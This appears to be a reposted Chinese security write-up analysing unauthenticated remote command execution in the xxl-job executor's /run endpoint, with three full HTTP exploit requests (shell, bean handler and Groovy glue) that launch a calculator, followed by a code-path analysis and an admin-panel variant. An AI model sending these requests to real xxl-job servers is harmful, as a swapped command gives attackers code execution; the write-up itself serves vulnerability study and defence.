Shell脚本
数据包如下:
POST /run HTTP/1.1Host: 127.0.0.1:9999Content-Length: 365Accept: */*X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close{"jobId": 2,"executorHandler": "demoJobHandler","executorParams": "demoJobHandler","executorBlockStrategy": "COVER_EARLY","executorTimeout": 0,"logId": 1,"logDateTime": 1586629003729,"glueType": "GLUE_SHELL","glueSource": "open -a Calculator","glueUpdatetime": 1586629003727,"broadcastIndex": 0,"broadcastTotal": 0}
XXlJobExecutorApplication的命令执行例子
数据包如下:
POST /run HTTP/1.1Host: 127.0.0.1:9999Accept: */*X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Length: 365{"broadcastIndex": 0,"broadcastTotal": 1,"executorBlockStrategy": "SERIAL_EXECUTION","executorHandler": "commandJobHandler","executorParams": "open -a Calculator","executorTimeout": 0,"glueSource": "","glueType": "BEAN","glueUpdatetime": 1691655642000,"jobId": 4,"logDateTime": 1691724573797,"logId": 20}
执行java语句
POST /run HTTP/1.1Host: 127.0.0.1:9999Accept: */*X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Length: 758{"broadcastIndex": 0,"broadcastTotal": 1,"executorBlockStrategy": "SERIAL_EXECUTION","executorHandler": "","executorParams": "","executorTimeout": 0,"glueSource": "package com.xxl.job.service.handler;nnimport com.xxl.job.core.log.XxlJobLogger;nimport com.xxl.job.core.biz.model.ReturnT;nimport com.xxl.job.core.handler.IJobHandler;nnpublic class DemoGlueJobHandler extends IJobHandler {nnt@Overridentpublic ReturnTu003cStringu003e execute(String param) throws Exception {n tRuntime.getRuntime().exec("open -a Calculator");nttreturn ReturnT.SUCCESS;nt}nn}n","glueType": "GLUE_GROOVY","glueUpdatetime": 1691732818000,"jobId": 3,"logDateTime": 1691732882189,"logId": 23}
0x01.2 漏洞分析
环境搭建直接克隆GitHub上的2.2.0以及以下的版本,然后启动com.xxl.job.executor.XxlJobExecutorApplication即可,对于Executor,默认监听端口在9999,可通过application.properties配置:
Executor中处理http请求的类为com.xxl.job.core.server.EmbedServer.EmbedHttpServerHandler:
然后会进入到
com.xxl.job.core.server.EmbedServer.EmbedHttpServerHandler#process方法中根据不同的uri选择不同的处理方法,想要执行命令就得通过run接口触发,默认不需要鉴权
这里用到的run方法是com.xxl.job.core.biz.impl.ExecutorBizImpl#run,在这个方法中会根据请求中的glueType参数进入不同的处理方法中,此处用的是shell脚本,也就是GLUE_SHELL:
可以选择的方法如下图:
接下来会新建一个com.xxl.job.core.handler.impl.ScriptJobHandler,并将这个handler创建一个线程:
之后就是把创建好的线程放进触发器列表中,等待触发命令执行:
而对于XxlJobExecutorApplication自带的job来说则是进入到了他自己创建的例子中:
对于执行java语句来说选择的就是GLUE_GROOVY:
0x02 后台命令执行
0x02.1 漏洞复现
Shell脚本
添加shell脚本任务:
修改shell,保存:
选择立即执行一次:
通过执行日志可以看出来回显:
0x02.2 漏洞分析
触发任务执行的api为
com.xxl.job.admin.controller.JobInfoController#triggerJob
经过调用之后会进入
com.xxl.job.admin.core.thread.JobTriggerPoolHelper#addTrigger方法中:
然后进入
com.xxl.job.admin.core.trigger.XxlJobTrigger#processTrigger方法中:
进入到
com.xxl.job.admin.core.trigger.XxlJobTrigger#runExecutor中,会在这里面会调用
com.xxl.job.core.biz.client.ExecutorBizClient#run方法
在
com.xxl.job.core.biz.client.ExecutorBizClient#run方法中根据名字可以看出来就是往对应的url+/run中发送上面的Executor的参数:
最终还是调用的上面的Executor执行命令,其他的方法和上面一样的分析:
END
原文始发于微信公众号(杂七杂八聊安全):漏洞分析 | xxl-job的命令执行详解
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论